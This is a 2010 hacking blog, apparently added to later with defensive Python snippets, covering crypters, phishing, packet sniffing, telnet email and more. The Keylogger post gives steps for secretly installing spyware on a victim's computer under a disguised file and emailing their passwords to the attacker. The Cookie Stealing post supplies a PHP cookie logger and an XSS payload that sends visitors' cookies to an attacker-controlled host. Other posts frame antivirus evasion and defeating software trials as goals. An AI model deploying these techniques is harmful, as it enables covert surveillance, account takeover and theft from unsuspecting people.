Saturday, May 29, 2010

Crypters

I have already written about keyloggers in my previous articles, and mentioned that antiviruses detect keyloggers as viruses; hence a hacker has to use crypters to avoid antivirus detection of keyloggers.

What is Crypter?

Generally, an antivirus works by scanning the code of an application and searching for certain strings within it. If the antivirus detects any known malicious strings, it either stops the scan or deletes the file from the system as a virus. A crypter is a program that allows users to encrypt the code of their program. Thus a crypter is free software used to hide viruses, keyloggers or any RAT tool from antiviruses, so that they are not detected and deleted by antiviruses.

What does Crypter do?

A crypter simply assigns hidden values to each individual piece of code within the source code, so the source code becomes hidden. Hence the crypted trojan or virus we send bypasses antivirus detection, and our purpose of hacking is fulfilled without any AV hindrance. Not only does the crypter hide the source code, it also unpacks the encryption once the program is executed.

What is FUD?

FUD: Fully UnDetectable. With the increased use of crypters to bypass antiviruses, antivirus software became more advanced and started including crypter definitions to detect crypter strings within code. So using a crypter to hide keyloggers and RATs became more complicated, as nowadays no publicly available crypter is FUD.

Thursday, May 27, 2010

Zero Day Exploits

After reading my blogs here, most of my friends ask me about zero days. So here it goes, for all of you...

  • A zero-day exploit is when the exploit for a vulnerability is created before, or on the same day as, the vulnerability becomes known to the vendor.
  • A zero-day exploit is when someone takes advantage of a security vulnerability on the same day that the vulnerability becomes generally known.

Once a person identifies that an application or program contains a potential security vulnerability, that person can notify the publisher of the application or program so that action can be taken to repair or patch the vulnerability or defend against its exploitation. The worst part of a zero-day exploit is that some companies may not react fast enough to fix or patch the vulnerability. This leaves many users exposed, and many might already be infected. The good news is that sometimes the hackers can't expose or distribute the exploit faster than the fix. Hopefully this happens more often and suppresses any wrongdoing by the hackers.

Hackers are getting smarter and are able to expose vulnerabilities much faster. In some cases, a hacker may be the first to discover the vulnerability. In these situations, the vulnerability and the exploit may become apparent on the same day. There is no way to guard against the exploit before it happens.

The best thing you can do to protect against zero-day exploits is to follow good security policies in the first place: install and keep your anti-virus software up to date, and keep your system patched against the vulnerabilities you are already aware of.

Wednesday, May 26, 2010

Rogue Security Programs

Rogue security applications are also known as scareware, because they try to frighten users into thinking they need to buy a certain program. They look like legitimate anti-virus, anti-spyware and anti-malware products. These rogue applications appear beneficial from a security perspective but provide little or no protection and generate misleading alerts; essentially, they are malware pretending to be genuine Internet security programs, and they aim to steal your money, private information, etc.

How do Rogue Programs propagate?
Rogues are propagated in a variety of ways, using social engineering tactics to deceive and mislead people. For example:
1. You may see an ad for a security software product pop up on your PC as you're browsing the Web, warning you that your PC is infected with malware and prompting you to download a specific program to remove it.
2. You may see messages that appear to come from your operating system, telling you that your system is infected, and pushing you to take a certain action, like visit a website or download a program.

What do these programs do?
Rogue security software might report a virus even though your computer is actually clean. The software might also fail to report viruses when your computer is infected. Conversely, sometimes when you download rogue security software, it will install a virus or other malicious software on your computer so that the software has something to detect.

Update Yourself
There are many sites that have fragments of information about rogues or just aren’t updated regularly enough to be useful. In the Lavasoft Rogue Gallery (http://www.lavasoft.com/mylavasoft/rogues), you’ll find the names of every rogue seen, a screenshot of its user interface and additional information about it.

Be Careful With Short URL

URL shorteners are websites that claim to make a URL short, so that you can have a customized URL and don't need to send the long URL to anyone (e.g. "bit.ly", "tr.im", etc.). They are very popular with social networking sites such as Twitter, where there is a character limit on what you can post. The best thing about it is: it's free!

URL shortening services work by redirection, and this conceals the URL of the actual website you are landing on. So, someone could send you a link that says "http://bit.ly/dtFGUq" and actually send you to "http://www.techpandit.in/". Security is a big concern here, because you may get redirected to a website (hosted by the hacker) that hosts a browser exploit to download malware onto your system, or runs some evil script in your browser before you know it.

"For every new invention, there is an equal and opposite invention". There is a website called "http://longurl.org/". It will expand and show you any short URL that you type in. So, next time you receive such a shortened link, use this website and be sure that you are getting redirected to the correct website.
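
Here is a small Python script (added here as an example; it is not from the original post or from longurl.org) that does the same expansion locally: it issues HEAD requests without following redirects and records each hop, with a hop limit so a looping chain cannot hang it. The bit.ly link is the one from the post; the example.invalid destinations and the fake_fetch stand-in are constructed so the script runs offline.

```python
import http.client
from urllib.parse import urlsplit, urljoin

MAX_HOPS = 10  # guard against redirect loops and deliberately long chains


def _fetch_location(url):
    """Send one HEAD request and do NOT follow the redirect.

    Returns (status, Location header or None). This default talks to the
    network; pass a different fetch function to expand_url() to run offline.
    """
    parts = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.hostname, parts.port, timeout=10)
    try:
        path = parts.path or "/"
        if parts.query:
            path += "?" + parts.query
        conn.request("HEAD", path, headers={"User-Agent": "url-expander/0.1"})
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location")
    finally:
        conn.close()


def expand_url(url, fetch=_fetch_location, max_hops=MAX_HOPS):
    """Return the list of URLs visited, from `url` to the final landing page.

    Raises RuntimeError on a redirect loop or when the chain exceeds max_hops.
    """
    chain = [url]
    seen = {url}
    for _ in range(max_hops):
        status, location = fetch(chain[-1])
        if status not in (301, 302, 303, 307, 308) or not location:
            return chain  # not a redirect: this is where the browser would land
        nxt = urljoin(chain[-1], location)  # Location may be relative
        if nxt in seen:
            raise RuntimeError("redirect loop at " + nxt)
        seen.add(nxt)
        chain.append(nxt)
    raise RuntimeError("too many redirects (>%d)" % max_hops)


# Constructed, offline stand-in for the network: a two-hop chain.
FAKE_REDIRECTS = {
    "http://bit.ly/dtFGUq": (301, "http://example.invalid/landing"),
    "http://example.invalid/landing": (302, "/final"),
    "http://example.invalid/final": (200, None),
}


def fake_fetch(url):
    return FAKE_REDIRECTS.get(url, (404, None))


if __name__ == "__main__":
    for hop in expand_url("http://bit.ly/dtFGUq", fetch=fake_fetch):
        print(hop)
```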

Thursday, May 20, 2010

Remote Access to Any Computer From Anywhere


TeamViewer is a simple and fast solution for remote control, desktop sharing and file transfer that works behind any firewall and NAT proxy. With TeamViewer you can remotely control any computer as if you were sitting right in front of it, even through firewalls. All your partner has to do is start a small application, which does not even require installation or administrative rights. To connect to the desired computer, just run TeamViewer on the computer you want to connect to. On the first start, a TeamViewer ID and password are generated on that computer. Now make an account on http://www.teamviewer.com/ . If you already have an account, go to web login. After login it will ask you for the TeamViewer ID and password of the computer you want to connect to. Fill in this information and it will create a secure connection between your computer and the desired computer. The software can also be used for presentations, where you can show your own desktop to a partner.

You can read about the features of TeamViewer here: http://www.teamviewer.com/products/benefits.aspx

Track Your Sent Mail


E-mail tracking is a method for monitoring the delivery of an e-mail to its intended recipient. E-mail tracking is useful when the sender wants to know if the intended recipient actually received the e-mail, or if they clicked the links. However, due to the nature of the technology, e-mail tracking cannot be considered an absolutely accurate indicator that a message was opened or read by the recipient.

Most e-mail marketing software provides tracking features (e.g. ReadNotify.com), but they are not free. WhoReadMe offers you a commercial service, but FREE of charge, and will notify you when your e-mails get read or forwarded. WhoReadMe tells you the read duration, the recipient's actual location, organization name, operating system, etc.

Full features of WhoReadMe version 3 can be checked here http://whoreadme.com/full-features.html
To read more about WhoReadMe, visit the link http://whoreadme.com/faq.html

Wednesday, May 19, 2010

Off Topic : Flash Tutorials

Here are some Flash tutorials that I would like to share with you all. I hope they will be helpful to you if you are interested in learning Flash.

http://www.mediafire.com/file/o1tugxiom4z/1007mgtween.swf

http://www.mediafire.com/file/qguomzjzzvo/1007morphtxt.swf

http://www.mediafire.com/file/5ykjnjcm5my/1107addparticle.swf

http://www.mediafire.com/file/ywdmzjrdzid/1107gravity.swf

http://www.mediafire.com/file/qxoj2tgit5z/animation_setup.swf

http://www.mediafire.com/file/jzjnzzmlm4m/automatess.swf

http://www.mediafire.com/file/ntvm0xmomjj/bettertransitionss.swf

http://www.mediafire.com/file/dh0nxywjt0w/bounce_class.swf

http://www.mediafire.com/file/mvgmzjgy2tq/ClassicFilmGrain.swf

http://www.mediafire.com/file/vq2ni2niykm/cloudanim.swf

http://www.mediafire.com/file/5zzw2nzg2j2/countdown.swf

http://www.mediafire.com/file/wxyuljk5qrm/digital_clock.swf

http://www.mediafire.com/file/zgyzd3mj2db/fire_particle.swf

http://www.mediafire.com/file/wwtlddwnqiz/focuschange.swf

http://www.mediafire.com/file/4nzwkzmjuzj/globe.swf

http://www.mediafire.com/file/gkmziknyzdg/javascript_popup.swf

http://www.mediafire.com/file/ndgngo2kiyw/smoky_fade.swf

http://www.mediafire.com/file/dtyyyhmmtja/text_gradient.swf

Packet Sniffing

Network monitoring or packet sniffing tools are like many other infosec tools. They can be used for good or evil, it all depends on the intent of the user. A packet sniffer can be used legitimately by a network or system administrator to monitor and troubleshoot network traffic.

In its simplest form a packet sniffer just captures all of the packets of data that pass through a given network interface. Typically, the packet sniffer would only capture packets that were intended for the machine. However, if placed into promiscuous mode, the packet sniffer is also capable of capturing ALL packets traversing the network regardless of destination. (Ethernet cards have a filter that prevents the host machine from seeing traffic addressed to other stations. Sniffing programs turn off the filter, and thus see everyone's traffic.)

By placing a packet sniffer on a network in promiscuous mode, a malicious intruder can capture and analyze all of the network traffic. Within a given network, username and password information is often transmitted in clear text, which means that the information would be viewable by analyzing the packets being transmitted.

A packet sniffer can only capture packet information within a given subnet. Detecting rogue packet sniffers on your network is not an easy task. By its very nature the packet sniffer is passive: it simply captures the packets that are traveling to the network interface it is monitoring. There are ways to identify network interfaces on your network that are running in promiscuous mode, though, and this might be used as a means for locating rogue packet sniffers.
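
One local check for the promiscuous-mode case: on Linux the kernel exposes an interface's flags in /sys/class/net/<iface>/flags, and bit 0x100 (IFF_PROMISC) is set while a sniffer holds the card in promiscuous mode. The Python below is an added example, not from the post or any tool it names; the SAMPLE_FLAGS values are constructed so it runs without a real interface. It only finds sniffers on the host it runs on, not elsewhere on the subnet.

```python
import os

# Flag bits from <linux/if.h>
IFF_UP = 0x1
IFF_BROADCAST = 0x2
IFF_LOOPBACK = 0x8
IFF_PROMISC = 0x100    # set while the interface is in promiscuous mode
IFF_MULTICAST = 0x1000


def parse_flags(text):
    """Parse the contents of /sys/class/net/<iface>/flags (hex text, e.g. '0x1103\\n')."""
    return int(text.strip(), 16)


def is_promiscuous(flags):
    return bool(flags & IFF_PROMISC)


def promiscuous_interfaces(sysfs_root="/sys/class/net"):
    """Return the names of local interfaces whose IFF_PROMISC flag is set."""
    found = []
    for iface in sorted(os.listdir(sysfs_root)):
        try:
            with open(os.path.join(sysfs_root, iface, "flags")) as fh:
                flags = parse_flags(fh.read())
        except OSError:
            continue  # virtual interfaces without a flags file, or a race on removal
        if is_promiscuous(flags):
            found.append(iface)
    return found


# Constructed sample values, exactly as they would appear in the sysfs flags file.
SAMPLE_FLAGS = {
    "lo": "0x9\n",       # UP | LOOPBACK
    "eth0": "0x1003\n",  # UP | BROADCAST | MULTICAST: a normally configured card
    "eth1": "0x1103\n",  # the same plus IFF_PROMISC: something is sniffing on it
}


def scan_sample(samples=SAMPLE_FLAGS):
    """Apply the same test to the constructed sample instead of the live sysfs tree."""
    return [name for name, text in samples.items() if is_promiscuous(parse_flags(text))]


if __name__ == "__main__":
    print("sample:", scan_sample())
    if os.path.isdir("/sys/class/net"):
        print("this host:", promiscuous_interfaces())
```

The same bit is what `ip link` prints as PROMISC, and the kernel logs "entered promiscuous mode" when it is set, so a log watcher is the cheaper continuous version of this check.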


There are various categories of network monitoring tools:

1. Capture and analyze in detail all the packets on the wire or in the air.

(e.g., Wireshark (formerly called Ethereal) and Cain & Abel).

You can learn more about wireshark from http://wheelersoftware.com/articles/wireshark-tutorial.html

You can learn more about CAIN and ABEL from http://www.thehackerslibrary.com/?p=414

2. Show general characteristics of the network traffic (e.g., EtherApe or ntop).

3. Only show counts of packets to/from the host itself (e.g., iptraf).


I recommend you become familiar with network monitors or packet sniffers such as Wireshark. Learn what types of information can be discerned from the captured data and how you can put it to use to keep your network running smoothly. But, also be aware that users on your network may be running rogue packet sniffers, either experimenting out of curiosity or with malicious intent, and that you should do what you can to make sure this does not happen.

Tuesday, May 18, 2010

Run Trial Software Forever

There are some small utilities that allow you to run a program in the specified date and time. These utilities don't change the current system date and time of your computer, but only inject the date/time that you specify into the desired application. You can run multiple applications simultaneously, each application works with different date and time, while the real date/time of your system continues to run normally. One of them is RunAsDate.



RunAsDate intercepts the kernel API calls that return the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime) and replaces the current date/time with the date/time that you specify. RunAsDate doesn't require any installation process. In order to start using it, run RunAsDate.exe. In the main window of RunAsDate, select the desired date and time and the application that you want to run. Sometimes it will not work if the trial period of the software has already passed. So it is better to run it within the trial period and put the same date in the main window.



When Immediate Mode is turned on, RunAsDate injects the date/time immediately when the process starts, without waiting for the kernel to load. However, this mode can also cause trouble for some applications, especially if they were written in .NET. If executing an application from RunAsDate causes it to crash, you should turn off 'Immediate Mode'.



Supported OS:

Windows 2000, Windows XP, Windows Server 2003, Windows Server 2008, Windows Vista, and Windows 7.

Sunday, May 16, 2010

Keylogger


The simplest way to hack a victim's password is by using a keylogger. Keyloggers are also known as spy software. A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer's keyboard. To use it you don't need to have any special knowledge; anyone with a basic knowledge of computers can use it.

Follow these steps to install it on remote computer:


1. Download Winspy keylogger software from http://www.win-spy.com/
2. After downloading the software, run it. You will be asked to register yourself by entering a user ID and password. Remember this password, as it will be required to uninstall the software.
3. Now another box will appear that tells you the hot keys (Ctrl + Shift + F12) to start the Winspy keylogger.
4. On pressing the hot keys, a login box will appear asking for the user ID and password. Enter them and click OK.
5. After that Winspy’s main screen will be displayed.
6. Select Remote at top, then Remote install.
7. On doing this, you will get a popup that will ask following information.

User – Type victim’s name
File name – Name the file to be sent. Use a name that the victim will be happy to accept.
File icon – Keep it the same.
Picture – Select the image you want to apply to the keylogger.
Email keylog to – Enter your e-mail address. Hotmail and Yahoo don't accept keylog files, so enter another e-mail address.

8. After that, click on "Create Remote file". Now just add your image to a WinRAR archive and send this file to your victim. When the victim opens this file, the keylogger is installed on the victim's computer and all keystrokes typed by the victim will be sent to your e-mail inbox. Thus you will get all his passwords.

Monday, May 10, 2010

Cookie Stealing


Cookie stealing is one of the most fundamental aspects of XSS (cross-site scripting). Cookies are used to store valuable information such as username, password, IP address and much more, and that's why cookies are so important. Cookie stealing is the process of getting and changing other people's cookies.

Go to a website that requires a login and, after logging in, erase everything in the address bar, type "javascript:alert(document.cookie)" and press Enter. You should see a pop-up window with some information about your login, like username, password, etc. It may be that the cookie contains the password as a hash, but with some luck hashes can be cracked. Sometimes it may also be possible to just paste the hash into your cookie at the right place and log in with the victim's account.

This does not mean that to get a victim's password you have to get him to sit down, log in and type a script that shows you the alert box. You have to be smart and use tricks. These tricking techniques are known as social engineering. All you have to do is fool the victim: for example, after he logs in, make him click on a page/link that contains the malicious script.

For cookie stealing, you first have to find an XSS vulnerability. Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a profile option, etc. Most websites apply some sort of filter to input. XSS deals with finding flaws in those filters, allowing you to put your own code into the website.

Example:
Get a free web host that supports PHP and make a new file. In the new file, type this:

<?php
$cookie=$_GET['cookie'] . "\n";
$fh=fopen('evil.txt','ab');
fwrite($fh,$cookie);
fclose($fh);
?>


Save it as evil.php. Now make an empty text file named evil.txt.


Let's assume that we have a website that has user login as well as a profile option and doesn't have any kind of input filtering. This means that you can put HTML and JavaScript in your profile. In your profile, write the following code:

<script>document.location="http://yourwebsite.com/evil.php?cookie="+document.cookie</script>

Whenever someone views your profile, they will be redirected to your script with their cookie in the URL. If you look at evil.txt now, you will see the victim's cookie.
You can steal the cookie of a victim's mail account by simply mailing the victim an e-mail that contains the link to the script. If the victim clicks on the link, you get the information that is stored in his cookie. You can also hide the script in an image.
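
From the defender's side, the attack above needs two things: the profile text must be rendered unescaped, and the session cookie must be readable by script. The Python below (an added example, not from the post) shows the vulnerable rendering next to the escaped one, and builds a Set-Cookie header with HttpOnly, which keeps document.cookie from exposing the session even if a script does get injected. The payload is the alert-style one from the post; the session value is constructed.

```python
import html
from http.cookies import SimpleCookie


def render_profile_unsafe(bio):
    """The vulnerable pattern the post relies on: user text dropped straight into the page."""
    return "<div class='bio'>" + bio + "</div>"


def render_profile_safe(bio):
    """Hardened form: HTML-escape untrusted text so a <script> tag is displayed, not executed."""
    return "<div class='bio'>" + html.escape(bio, quote=True) + "</div>"


def session_cookie_header(session_id):
    """Build a Set-Cookie header for the session.

    HttpOnly: document.cookie cannot read it, so the redirect trick above carries nothing.
    Secure:   only sent over HTTPS, so a sniffer on the LAN does not see it in clear text.
    SameSite: not attached to cross-site requests started from another origin.
    """
    c = SimpleCookie()
    c["session"] = session_id
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["samesite"] = "Lax"
    c["session"]["path"] = "/"
    return c.output(header="Set-Cookie:").strip()


def script_survives(rendered):
    """True if a raw <script> tag is still present in the HTML about to be sent to the browser."""
    return "<script" in rendered.lower()


# Constructed profile text shaped like the payload in the post.
PAYLOAD = "<script>alert(document.cookie)</script>"

if __name__ == "__main__":
    print("unsafe :", render_profile_unsafe(PAYLOAD))
    print("safe   :", render_profile_safe(PAYLOAD))
    print(session_cookie_header("constructed-session-id"))
```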

Sunday, May 9, 2010

Phishing Exposed


One day you find an e-mail from Google that seems suspicious, especially since it threatens to close your account if you don't reply. What do you do?
 
This message and others like it are examples of phishing: the act of sending an e-mail to a user, falsely claiming to be an established legitimate enterprise, in an attempt to scam the user into surrendering private information that will be used for identity theft. The e-mail directs the user to visit a Web site (uploaded by the phishers) where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers. The Web site, however, only looks like the original; it is fake and set up only to steal the user's information. Phishers can also infect computers with viruses and convince people to participate unwittingly in money laundering.
 
Most people associate phishing with e-mail messages that spoof, or mimic, banks and credit card companies, mail accounts or other businesses like Amazon and eBay. These e-mails look authentic and attempt to get victims to reveal their personal information. E-mail is the most common way to distribute phishing lures, but some scammers seek out victims through instant messages, cell phone text (SMS) messages, chat rooms, fake banner ads, message boards and mailing lists, etc.
 
There are several methods by which one can send an e-mail from someone else's account just by knowing his/her e-mail ID; one of them is sending e-mail through cmd. Once phishers know who their victims are, they create methods for delivering the message and collecting the data. Most often, this involves e-mail addresses and a Web page. Phishers record the victims' information from the Web pages or popup windows which the victims fill in. The phishers then use the information they've gathered to make illegal purchases or otherwise commit fraud.
 
Phishers often use company logos and legitimate e-mail messages, with links that direct the victim to a fraudulent page. They use spoofed, or fake, e-mail addresses in the "From:" and "Reply-to" fields of the message, and they use obfuscated links (misspelled versions of the company URL, alternate formats like hexadecimal, etc.) to make them look legitimate. Most phishing messages give the victim a reason to take immediate action, prompting him to act first and think later.
 
Tips for users
 
1. Always check the URL before filling in your personal information.
2. If it is asking for a username and password, first try logging in with a wrong one. If it is not fake, it will tell you that your password is wrong.
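
Tip 1 is harder than it sounds when the link is obfuscated in the ways listed above. The Python below (an added example, not from the post) reveals the host a browser will actually connect to, undoing a fake "user@" prefix, percent-encoding, and hexadecimal or decimal integer IP addresses, and then checks whether that host really belongs to the expected domain. The sample URLs use google.com from the post together with constructed evil.invalid hosts.

```python
import ipaddress
import re
from urllib.parse import urlsplit, unquote


def real_host(url):
    """Return the host the browser will really connect to, with common disguises undone.

    - 'http://www.google.com@evil.invalid/' : everything before '@' is userinfo, not the host
    - 'http://%67oogle.com/'                : percent-encoded host characters
    - 'http://0x7f000001/' or 'http://2130706433/' : an IPv4 address written as one integer
    """
    parts = urlsplit(url.strip())
    host = parts.hostname or ""          # .hostname already strips userinfo and the port
    host = unquote(host).lower().rstrip(".")
    try:
        if re.fullmatch(r"0x[0-9a-f]+", host):
            return str(ipaddress.IPv4Address(int(host, 16)))
        if re.fullmatch(r"[0-9]+", host):
            return str(ipaddress.IPv4Address(int(host, 10)))
    except ipaddress.AddressValueError:
        pass  # an integer too large for IPv4: report it as written
    return host


def belongs_to(host, brand_domain):
    """True only if host IS brand_domain or a real subdomain of it.

    'www.google.com.evil.invalid' ends with 'google.com.' nowhere, so it fails;
    'g00gle.com' fails; 'accounts.google.com' passes.
    """
    brand_domain = brand_domain.lower()
    return host == brand_domain or host.endswith("." + brand_domain)


def check_link(url, brand_domain):
    """Return (real host, verdict) for a link that claims to belong to brand_domain."""
    host = real_host(url)
    verdict = "ok" if belongs_to(host, brand_domain) else "SUSPICIOUS"
    return host, verdict


# Constructed sample links, the kind a phishing mail claiming to be from Google might carry.
SAMPLES = [
    "https://accounts.google.com/ServiceLogin",
    "http://www.google.com@evil.invalid/login",
    "http://www.google.com.evil.invalid/login",
    "http://0x7f000001/login",
    "http://g00gle.com/login",
]

if __name__ == "__main__":
    for link in SAMPLES:
        host, verdict = check_link(link, "google.com")
        print("%-45s -> %-22s %s" % (link, host, verdict))
```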

Friday, May 7, 2010

E-mail With Command Prompt



Write E-mail from CMD


Follow these Steps

1. Open the cmd prompt ( Start -> Run -> Type cmd -> Press Enter ).

2. Type telnet server port -> Press Enter and wait for response.
[ server: Outgoing Mail Server, port : Smtp Server Port Number (default  25)]

3. Type HELO server.com -> Press Enter and wait for response
[Some servers accept 'EHLO' in place of 'HELO']

4. Type MAIL FROM: sender's e-mail ID -> Press Enter and wait for response

5. Type RCPT TO: recipient's e-mail IDs -> Press Enter and wait for response
[separated by ',']

6. Type DATA -> Press Enter and wait for response, then type your message.
[To end the message, put a single dot '.' on a line by itself and press Enter.]

Warnings for users
Google's mail server uses TLS for sending e-mail, and DOS telnet does not support TLS.
Hotmail and some other mail services do not allow telnet access to their mail servers. This can be tracked by anyone with enough technical skill, access to your ISP's records, and a bit of determination, so don't do anything you wouldn't want to be associated with you.
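
To show what the server says back at each of the steps above, here is a small Python simulation of the SMTP server side of this dialogue (an added example, not from the post; the reply codes follow RFC 5321 and nothing is sent anywhere). It also shows the detail step 6 glosses over: DATA gets a 354 reply first, the message lines follow, and the lone '.' line ends the message. Addresses and the server name are constructed, and the simulation takes one address per RCPT TO line.

```python
class SmtpServerSim:
    """Server side of a HELO / MAIL FROM / RCPT TO / DATA / QUIT session, in memory only."""

    def __init__(self, name="mail.example.invalid"):
        self.name = name
        self.greeted = False
        self.sender = None
        self.rcpts = []
        self.in_data = False
        self.body = []
        self.delivered = []   # (sender, recipients, message text) for each completed DATA

    def connect(self):
        return "220 %s ESMTP ready" % self.name

    def handle(self, line):
        """Return the reply for one client line, or None while message lines are being read."""
        if self.in_data:
            if line == ".":                       # lone dot: end of message
                self.in_data = False
                self.delivered.append((self.sender, list(self.rcpts), "\n".join(self.body)))
                self.sender, self.rcpts, self.body = None, [], []
                return "250 2.0.0 OK: queued"
            # dot-stuffing: a body line that really starts with '.' was sent as '..'
            self.body.append(line[1:] if line.startswith(".") else line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.greeted = True
            return "250 %s" % self.name
        if not self.greeted:
            return "503 5.5.1 Error: send HELO/EHLO first"
        if verb == "MAIL":
            self.sender = arg.partition(":")[2].strip()
            return "250 2.1.0 OK"
        if verb == "RCPT":
            if self.sender is None:
                return "503 5.5.1 Error: need MAIL command"
            self.rcpts.append(arg.partition(":")[2].strip())
            return "250 2.1.5 OK"
        if verb == "DATA":
            if not self.rcpts:
                return "554 5.5.1 Error: no valid recipients"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "502 5.5.2 Error: command not recognized"


def run_session(lines):
    """Feed client lines to the simulated server; return (delivered messages, transcript)."""
    srv = SmtpServerSim()
    transcript = ["S: " + srv.connect()]
    for line in lines:
        transcript.append("C: " + line)
        reply = srv.handle(line)
        if reply is not None:
            transcript.append("S: " + reply)
    return srv.delivered, transcript


# Constructed client side, following the steps in the post.
CLIENT_LINES = [
    "HELO server.com",
    "MAIL FROM:<sender@example.invalid>",
    "RCPT TO:<recipient@example.invalid>",
    "DATA",
    "Subject: test",
    "",
    "Hello from telnet.",
    ".",
    "QUIT",
]

if __name__ == "__main__":
    for entry in run_session(CLIENT_LINES)[1]:
        print(entry)
```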

Check E-mail from CMD
Telnet can be used as another way to check email.

Follow these Steps

1. Open the cmd prompt ( Start -> Run -> Type cmd -> Press Enter ).

2. Type telnet emailprovider.com port -> Press Enter and wait for response
[emailprovider: Incoming Mail Server, port: Server Port Number (default POP3/IMAP 110/143)].

3. Type USER yourusername  -> Press Enter and wait for response
[you may see what you type or not, and "yourusername" should be changed to whatever comes before the @ in your email address.]

4. Then type in PASS yourpassword -> Press Enter and wait for response
[if you can see what you type, you will see your password]

5. Type list -> Press Enter and wait for response.

6. You will see a list of items with labels like "1 1024" and "2 123556". If you want to look at the message labeled 2 123556, type retr 2. You can replace the 2 with any other number to view other messages. If you want to delete message 1 1024, type dele 1.
[When you are done checking your email, type quit and press Enter.]

Mail Server Settings
Hotmail Settings : Like other web-based e-mail services, Hotmail uses the HTTP protocol to connect you to your mailbox. If you want to send and receive Hotmail e-mails using e-mail client software, then your software must support Hotmail HTTP access for your e-mail account. Some e-mail clients, such as Outlook Express or Microsoft Outlook, offer built-in support for Hotmail accounts, so you only have to select HTTP when you are asked to select your e-mail account type and select Hotmail as the HTTP Mail Service Provider.
Hotmail Incoming Mail Server (POP3) - pop3.live.com (logon using Secure Password Authentication - SPA, mail server port: 995)
Hotmail Outgoing Mail Server (SMTP) - smtp.live.com (SSL enabled, port 25)

Yahoo! Mail Settings : Yahoo Mail offers standard POP3 access for receiving emails incoming through your Yahoo mailbox, by using your favorite email client software. To setup your email client for working with your Yahoo account, you need to select the POP3 protocol and use the following mail server settings:
Yahoo Incoming Mail Server (POP3) - pop.mail.yahoo.com (port 110)
Yahoo Outgoing Mail Server (SMTP) - smtp.mail.yahoo.com (port 25)
POP Yahoo! Mail Plus email server settings.
Yahoo Plus Incoming Mail Server (POP3) - plus.pop.mail.yahoo.com (SSL enabled, port 995)
Yahoo Plus Outgoing Mail Server (SMTP) - plus.smtp.mail.yahoo.com (SSL enabled, port 465, use authentication)

Google GMail Settings : The Google GMail service offers email client access for retrieving and sending emails through your Gmail account. However, for security reasons, GMail uses POP3 over an SSL connection, so make sure your email client supports encrypted SSL connections.
Google Gmail Incoming Mail Server (POP3) - pop.gmail.com (SSL enabled, port 995)
Outgoing Mail Server - use the SMTP mail server address provided by your local ISP or smtp.gmail.com (SSL enabled, port 465)

MSN Mail Settings : The MSN email service allows you to use the MSN POP3 and SMTP servers to access your MSN mailbox.
MSN Incoming Mail Server (POP3) - pop3.email.msn.com (port 110, using Secure Password Authentication - SPA)
MSN Outgoing Mail Server - smtp.email.msn.com (select "My outgoing server requires authentication")

AOL Mail Settings : The AOL email service is a web based system, designed for managing your AOL mailbox via HTTP IMAP access. Unlike Hotmail, you can use any email client to access your AOL mailbox, as long as it supports the IMAP protocol.
AOL Incoming Mail Server (IMAP) - imap.aol.com (port 143)
AOL Outgoing Mail Server - smtp.aol.com or use your local ISP SMTP mail server
Mail.com Mail Settings.

Thursday, May 6, 2010

My First Blog

Welcome to my first BLOG entry. People who know me have asked me for years why I don't start one. Now they will probably be asking themselves: Arpit, a blog?? Well, all the cool kids are doing it, and I now realize that there is so much information that I come across that is truly useful, so I thought I should have a go at it too.

In many cases the ideas don't require an entire article anyway. Blogging seems to make a lot of sense as an actual time saver for me. Don't expect me to write about my personal life much here; this will mostly be a log of hacking activities (Web as well as Network), with occasional other stuff thrown in.

Thanks to the folks who’ve been pestering me to blog for a year or so. Thanks for reading and I hope all my time and effort helps (or at least entertains) you on many levels.

Visit this blog regularly for interesting stuff. That's enough for now. I'll try to do this twice a week or so.